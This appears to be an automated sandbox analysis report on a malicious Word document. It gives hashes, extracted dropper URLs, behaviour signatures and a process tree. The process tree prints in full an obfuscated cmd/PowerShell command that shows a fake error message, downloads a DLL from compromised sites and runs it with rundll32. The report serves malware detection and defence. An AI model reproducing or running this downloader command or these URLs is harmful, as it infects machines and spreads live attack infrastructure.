Analysis

  • max time kernel
    139s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 19:12

General

  • Target

    DOC_1301_U_92121711.doc

  • Size

    158KB

  • MD5

    7f013028b389d513b3ecdb0314a8e565

  • SHA1

    6ab79010a6d9ceef32f6c7429a20fab9c2b3e161

  • SHA256

    1186bddeaa3cf409c79c698387ea235caec1d0f737790405f6cc12f64b90b5e5

  • SHA512

    38ca252877b342847d90fa20962ac9097038699b46645474eef57a31c12ac873ba56f64fe39cf576315442e8e232877d519e1be3d857daa679a7798ac2a96680

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://smkbudiagung.com/wp-content/VoPg04/

exe.dropper

https://ats-tx.com/old/f1X/

exe.dropper

http://avanttipisos.com.br/catalogo-virtual/U/

exe.dropper

http://mpeakecreations.co.za/cgi-bin/vVk1rw/

exe.dropper

http://adres-ug.ru/wp-admin/IItD/

exe.dropper

https://theraven.pk/overwolf-r6-vdace/UH4fL/

exe.dropper

http://bhar.com.br/elementos/MQfB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DOC_1301_U_92121711.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:984
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAHQAIAAoACcAVgA4AEUAJwArACcARwA1AEgAJwApACAAKABbAHQAWQBwAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAE0ALgBpAE8ALgBkAGkAUgBFAEMAdABvACcALAAnAHkAcwAnACwAJwBZACcALAAnAFQAZQAnACwAJwByACcALAAnAFMAJwApACAAIAApACAAIAA7AHMARQBUAC0AaQB0AEUAbQAgACgAIgBWAGEAIgArACIAcgBJAGEAYgBsACIAKwAiAGUAIgArACIAOgB5AGYAVwA1AGoATQAiACkAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADcAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADYAfQAiACAALQBGACAAJwBOACcALAAnAHMAeQAnACwAJwB0AG0AYQAnACwAJwBQAG8ASQAnACwAJwBFAE0ALgBOAGUAdAAuAFMARQByACcALAAnAFMAdAAnACwAJwBOAEEARwBFAFIAJwAsACcAdgBpAGMARQAnACkAIAAgACkAOwAgACQARgBmADcAYQBvAGkAeAA9ACQASgAxADgARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWAA5ADUATQA7ACQAVAAxADAAUQA9ACgAJwBEADcAJwArACcAXwBUACcAKQA7ACAAIAAoACAAIABJAHQARQBtACAAIAAoACIAVgBBAHIASQAiACsAIgBhACIAKwAiAGIATABFADoAIgArACIAVgA4AEUAZwA1AEgAIgApACAAKQAuAHYAQQBsAFUARQA6ADoAIgBjAHIARQBgAEEAYABUAGUARABpAFIAZQBjAHQAYABPAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbQB1ACcAKwAnAEEATwAxAHIAJwArACcAeABsADkAJwApACsAKAAnAHQAJwArACcAbQB1AEEASwAnACsAJwAyACcAKQArACcAaQBqACcAKwAnAGkAJwArACgAJwB0AGwAJwArACcAbQAnACkAKwAnAHUAQQAnACkALgAiAFIAZQBwAGAAbABhAEMAZQAiACgAKAAnAG0AJwArACcAdQBBACcAKQAsACcAXAAnACkAKQApADsAJABCADkAOQBHAD0AKAAoACcAQgBfACcAKwAnADkAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAQQByAEkAQQBiAGwARQAgACAAKAAiAFkARgBXADUASgAiACsAIgBNACIAKQApAC4AVgBBAEwAdQBlADoAOgAiAHMARQBgAEMAYABVAFIAaQB0AFkAcABgAFIATwBgAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzADEAJwArACcAMgAnACkAKQA7ACQAVQA4ADAASAA9ACgAKAAnAEgAJwArACcANgA1ACcAKQArACcAWgAnACkAOwAkAEYAdAAxAG4AcgBoAGIAIAA9ACAAKAAnAFkAMQAnACsAJwAyAFMAJwApADsAJABNADkAOQBDAD0AKAAoACcAUgAnACsAJwA0ADkAJwApACsAJwBFACcAKQA7ACQASgBpADMAbAA1AHUAcgA9ACQASABPAE0ARQArACgAKAAnAGEAdQAnACsAKAAnADQAJwArACcATwAxACcAKQArACcAcgAnACsAJwB4AGwAJwArACgAJwA5ACcAKwAnAHQAYQB1ADQAJwArACcASwAyAGkAJwApACsAKAAnAGoAJwArACcAaQB0ACcAKQArACgAJwBsAGEAdQAnACsAJwA0ACcAKQApAC4AIgBSAEUAYABwAGAATABhAEMARQAiACgAKAAnAGEAJwArACcAdQA0ACcAKQAsACcAXAAnACkAKQArACQARgB0ADEAbgByAGgAYgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAE8ANAA1AEUAPQAoACcAWQAnACsAKAAnADEAJwArACcANgBTACcAKQApADsAJABEADYAZgA4ADEAdgBqAD0AKAAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwBzACcAKwAoACcAOgAvAC8AJwArACcAcwAnACsAJwBtAGsAYgAnACsAJwB1AGQAaQBhAGcAdQBuAGcAJwArACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBjAG8AbgB0AGUAbgB0AC8AVgAnACsAJwBvACcAKQArACcAUABnACcAKwAoACcAMAA0ACcAKwAnAC8AJwApACsAKAAnAEAAJwArACcAQQBdACcAKQArACcAWwAnACsAKAAnAHEAJwArACcAWwBEAHMAJwApACsAKAAnADoALwAnACsAJwAvAGEAdABzAC0AdAAnACsAJwB4ACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AbwBsACcAKwAnAGQALwAnACkAKwAoACcAZgAxAFgALwAnACsAJwBAACcAKQArACgAJwBBAF0AWwBxAFsAJwArACcARAA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AGEAJwArACcAbgB0AHQAaQBwACcAKwAnAGkAcwBvACcAKQArACgAJwBzAC4AYwBvAG0ALgBiACcAKwAnAHIAJwArACcALwBjAGEAdABhAGwAJwArACcAbwBnAG8ALQAnACkAKwAoACcAdgAnACsAJwBpAHIAdAAnACkAKwAoACcAdQBhACcAKwAnAGwALwBVAC8AQABBAF0AJwArACcAWwBxAFsAJwArACcARAA6AC8AJwApACsAJwAvACcAKwAnAG0AJwArACgAJwBwAGUAYQBrACcAKwAnAGUAYwByAGUAJwApACsAJwBhACcAKwAoACcAdABpACcAKwAnAG8AbgBzACcAKwAnAC4AYwBvACcAKQArACcALgAnACsAKAAnAHoAYQAvACcAKwAnAGMAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8AdgBWAGsAMQAnACsAJwByAHcALwBAACcAKwAnAEEAXQAnACkAKwAoACcAWwBxACcAKwAnAFsARAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGEAJwArACcAZAByAGUAcwAtAHUAZwAuAHIAdQAnACsAJwAvACcAKQArACcAdwAnACsAJwBwAC0AJwArACcAYQAnACsAKAAnAGQAbQBpACcAKwAnAG4ALwAnACkAKwAoACcASQAnACsAJwBJACcAKwAnAHQARAAvAEAAJwArACcAQQAnACsAJwBdAFsAcQBbAEQAcwAnACkAKwAnADoALwAnACsAJwAvAHQAJwArACgAJwBoACcAKwAnAGUAcgAnACkAKwAnAGEAJwArACgAJwB2AGUAbgAuAHAAJwArACcAawAvACcAKQArACgAJwBvAHYAZQAnACsAJwByAHcAbwAnACsAJwBsACcAKQArACgAJwBmAC0AcgA2ACcAKwAnAC0AdgBkAGEAJwArACcAYwBlACcAKQArACgAJwAvAFUASAA0AGYAJwArACcATAAnACsAJwAvAEAAJwApACsAKAAnAEEAXQAnACsAJwBbAHEAWwBEACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwBiAGgAJwApACsAKAAnAGEAcgAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAuAGIAcgAnACsAJwAvAGUAbAAnACsAJwBlAG0AJwApACsAKAAnAGUAbgB0ACcAKwAnAG8AJwArACcAcwAvAE0AUQAnACkAKwAoACcAZgBCACcAKwAnAC8AJwApACkALgAiAFIAZQBwAGwAYABBAGAAQwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkACcAKwAoACcAcwBlAHcAJwArACcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAcABMAGAAaQBUACIAKAAkAEIAMgA3AEEAIAArACAAJABGAGYANwBhAG8AaQB4ACAAKwAgACQAUAAyAF8AQwApADsAJABBADgAMQBCAD0AKAAnAEgAMgAnACsAJwA3AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHQAeAAwAGcAMgB4ACAAaQBuACAAJABEADYAZgA4ADEAdgBqACkAewB0AHIAeQB7ACgALgAoACcATgAnACsAJwBlACcAKwAnAHcALQBPAGIAagBlAGMAdAAnACkAIABTAHkAUwB0AEUATQAuAE4ARQB0AC4AdwBFAEIAYwBsAEkAZQBuAFQAKQAuACIARABPAGAAdwBOAEwATwBhAGQARgBgAEkAYABsAEUAIgAoACQAUQB0AHgAMABnADIAeAAsACAAJABKAGkAMwBsADUAdQByACkAOwAkAEwAXwA4AFQAPQAoACgAJwBZADEAJwArACcANAAnACkAKwAnAEUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAaQAzAGwANQB1AHIAKQAuACIATABgAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADQAMwA4ADUAOAApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABKAGkAMwBsADUAdQByACwAKAAnAFMAJwArACgAJwBoAG8AdwAnACsAJwBEACcAKQArACgAJwBpACcAKwAnAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAFQATwBzAGAAVAByAEkAYABOAGcAIgAoACkAOwAkAFAANQAwAEUAPQAoACgAJwBGACcAKwAnADkAOQAnACkAKwAnAE4AJwApADsAYgByAGUAYQBrADsAJABLADgAMQBNAD0AKAAoACcASQA1ACcAKwAnADgAJwApACsAJwBOACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwA3ADcASwA9ACgAJwBOADkAJwArACcAXwBLACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc UwBlAHQAIAAoACcAVgA4AEUAJwArACcARwA1AEgAJwApACAAKABbAHQAWQBwAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAE0ALgBpAE8ALgBkAGkAUgBFAEMAdABvACcALAAnAHkAcwAnACwAJwBZACcALAAnAFQAZQAnACwAJwByACcALAAnAFMAJwApACAAIAApACAAIAA7AHMARQBUAC0AaQB0AEUAbQAgACgAIgBWAGEAIgArACIAcgBJAGEAYgBsACIAKwAiAGUAIgArACIAOgB5AGYAVwA1AGoATQAiACkAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADcAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADYAfQAiACAALQBGACAAJwBOACcALAAnAHMAeQAnACwAJwB0AG0AYQAnACwAJwBQAG8ASQAnACwAJwBFAE0ALgBOAGUAdAAuAFMARQByACcALAAnAFMAdAAnACwAJwBOAEEARwBFAFIAJwAsACcAdgBpAGMARQAnACkAIAAgACkAOwAgACQARgBmADcAYQBvAGkAeAA9ACQASgAxADgARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWAA5ADUATQA7ACQAVAAxADAAUQA9ACgAJwBEADcAJwArACcAXwBUACcAKQA7ACAAIAAoACAAIABJAHQARQBtACAAIAAoACIAVgBBAHIASQAiACsAIgBhACIAKwAiAGIATABFADoAIgArACIAVgA4AEUAZwA1AEgAIgApACAAKQAuAHYAQQBsAFUARQA6ADoAIgBjAHIARQBgAEEAYABUAGUARABpAFIAZQBjAHQAYABPAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbQB1ACcAKwAnAEEATwAxAHIAJwArACcAeABsADkAJwApACsAKAAnAHQAJwArACcAbQB1AEEASwAnACsAJwAyACcAKQArACcAaQBqACcAKwAnAGkAJwArACgAJwB0AGwAJwArACcAbQAnACkAKwAnAHUAQQAnACkALgAiAFIAZQBwAGAAbABhAEMAZQAiACgAKAAnAG0AJwArACcAdQBBACcAKQAsACcAXAAnACkAKQApADsAJABCADkAOQBHAD0AKAAoACcAQgBfACcAKwAnADkAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAQQByAEkAQQBiAGwARQAgACAAKAAiAFkARgBXADUASgAiACsAIgBNACIAKQApAC4AVgBBAEwAdQBlADoAOgAiAHMARQBgAEMAYABVAFIAaQB0AFkAcABgAFIATwBgAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzADEAJwArACcAMgAnACkAKQA7ACQAVQA4ADAASAA9ACgAKAAnAEgAJwArACcANgA1ACcAKQArACcAWgAnACkAOwAkAEYAdAAxAG4AcgBoAGIAIAA9ACAAKAAnAFkAMQAnACsAJwAyAFMAJwApADsAJABNADkAOQBDAD0AKAAoACcAUgAnACsAJwA0ADkAJwApACsAJwBFACcAKQA7ACQASgBpADMAbAA1AHUAcgA9ACQASABPAE0ARQArACgAKAAnAGEAdQAnACsAKAAnADQAJwArACcATwAxACcAKQArACcAcgAnACsAJwB4AGwAJwArACgAJwA5ACcAKwAnAHQAYQB1ADQAJwArACcASwAyAGkAJwApACsAKAAnAGoAJwArACcAaQB0ACcAKQArACgAJwBsAGEAdQAnACsAJwA0ACcAKQApAC4AIgBSAEUAYABwAGAATABhAEMARQAiACgAKAAnAGEAJwArACcAdQA0ACcAKQAsACcAXAAnACkAKQArACQARgB0ADEAbgByAGgAYgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAE8ANAA1AEUAPQAoACcAWQAnACsAKAAnADEAJwArACcANgBTACcAKQApADsAJABEADYAZgA4ADEAdgBqAD0AKAAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwBzACcAKwAoACcAOgAvAC8AJwArACcAcwAnACsAJwBtAGsAYgAnACsAJwB1AGQAaQBhAGcAdQBuAGcAJwArACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBjAG8AbgB0AGUAbgB0AC8AVgAnACsAJwBvACcAKQArACcAUABnACcAKwAoACcAMAA0ACcAKwAnAC8AJwApACsAKAAnAEAAJwArACcAQQBdACcAKQArACcAWwAnACsAKAAnAHEAJwArACcAWwBEAHMAJwApACsAKAAnADoALwAnACsAJwAvAGEAdABzAC0AdAAnACsAJwB4ACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AbwBsACcAKwAnAGQALwAnACkAKwAoACcAZgAxAFgALwAnACsAJwBAACcAKQArACgAJwBBAF0AWwBxAFsAJwArACcARAA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AGEAJwArACcAbgB0AHQAaQBwACcAKwAnAGkAcwBvACcAKQArACgAJwBzAC4AYwBvAG0ALgBiACcAKwAnAHIAJwArACcALwBjAGEAdABhAGwAJwArACcAbwBnAG8ALQAnACkAKwAoACcAdgAnACsAJwBpAHIAdAAnACkAKwAoACcAdQBhACcAKwAnAGwALwBVAC8AQABBAF0AJwArACcAWwBxAFsAJwArACcARAA6AC8AJwApACsAJwAvACcAKwAnAG0AJwArACgAJwBwAGUAYQBrACcAKwAnAGUAYwByAGUAJwApACsAJwBhACcAKwAoACcAdABpACcAKwAnAG8AbgBzACcAKwAnAC4AYwBvACcAKQArACcALgAnACsAKAAnAHoAYQAvACcAKwAnAGMAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8AdgBWAGsAMQAnACsAJwByAHcALwBAACcAKwAnAEEAXQAnACkAKwAoACcAWwBxACcAKwAnAFsARAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGEAJwArACcAZAByAGUAcwAtAHUAZwAuAHIAdQAnACsAJwAvACcAKQArACcAdwAnACsAJwBwAC0AJwArACcAYQAnACsAKAAnAGQAbQBpACcAKwAnAG4ALwAnACkAKwAoACcASQAnACsAJwBJACcAKwAnAHQARAAvAEAAJwArACcAQQAnACsAJwBdAFsAcQBbAEQAcwAnACkAKwAnADoALwAnACsAJwAvAHQAJwArACgAJwBoACcAKwAnAGUAcgAnACkAKwAnAGEAJwArACgAJwB2AGUAbgAuAHAAJwArACcAawAvACcAKQArACgAJwBvAHYAZQAnACsAJwByAHcAbwAnACsAJwBsACcAKQArACgAJwBmAC0AcgA2ACcAKwAnAC0AdgBkAGEAJwArACcAYwBlACcAKQArACgAJwAvAFUASAA0AGYAJwArACcATAAnACsAJwAvAEAAJwApACsAKAAnAEEAXQAnACsAJwBbAHEAWwBEACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwBiAGgAJwApACsAKAAnAGEAcgAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAuAGIAcgAnACsAJwAvAGUAbAAnACsAJwBlAG0AJwApACsAKAAnAGUAbgB0ACcAKwAnAG8AJwArACcAcwAvAE0AUQAnACkAKwAoACcAZgBCACcAKwAnAC8AJwApACkALgAiAFIAZQBwAGwAYABBAGAAQwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkACcAKwAoACcAcwBlAHcAJwArACcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAcABMAGAAaQBUACIAKAAkAEIAMgA3AEEAIAArACAAJABGAGYANwBhAG8AaQB4ACAAKwAgACQAUAAyAF8AQwApADsAJABBADgAMQBCAD0AKAAnAEgAMgAnACsAJwA3AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHQAeAAwAGcAMgB4ACAAaQBuACAAJABEADYAZgA4ADEAdgBqACkAewB0AHIAeQB7ACgALgAoACcATgAnACsAJwBlACcAKwAnAHcALQBPAGIAagBlAGMAdAAnACkAIABTAHkAUwB0AEUATQAuAE4ARQB0AC4AdwBFAEIAYwBsAEkAZQBuAFQAKQAuACIARABPAGAAdwBOAEwATwBhAGQARgBgAEkAYABsAEUAIgAoACQAUQB0AHgAMABnADIAeAAsACAAJABKAGkAMwBsADUAdQByACkAOwAkAEwAXwA4AFQAPQAoACgAJwBZADEAJwArACcANAAnACkAKwAnAEUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAaQAzAGwANQB1AHIAKQAuACIATABgAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADQAMwA4ADUAOAApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABKAGkAMwBsADUAdQByACwAKAAnAFMAJwArACgAJwBoAG8AdwAnACsAJwBEACcAKQArACgAJwBpACcAKwAnAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAFQATwBzAGAAVAByAEkAYABOAGcAIgAoACkAOwAkAFAANQAwAEUAPQAoACgAJwBGACcAKwAnADkAOQAnACkAKwAnAE4AJwApADsAYgByAGUAYQBrADsAJABLADgAMQBNAD0AKAAoACcASQA1ACcAKwAnADgAJwApACsAJwBOACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwA3ADcASwA9ACgAJwBOADkAJwArACcAXwBLACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eaqxjo\ruxya.ejm",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:3440

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • \Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • memory/984-2-0x00007FF81BCB0000-0x00007FF81C2E7000-memory.dmp
      Filesize

      6.2MB

    • memory/1960-4-0x0000000000000000-mapping.dmp
    • memory/1960-5-0x00007FF815430000-0x00007FF815E1C000-memory.dmp
      Filesize

      9.9MB

    • memory/1960-6-0x0000016D3B430000-0x0000016D3B431000-memory.dmp
      Filesize

      4KB

    • memory/1960-7-0x0000016D3B690000-0x0000016D3B691000-memory.dmp
      Filesize

      4KB

    • memory/2636-8-0x0000000000000000-mapping.dmp
    • memory/2680-10-0x0000000000000000-mapping.dmp
    • memory/3208-3-0x0000000000000000-mapping.dmp
    • memory/3440-12-0x0000000000000000-mapping.dmp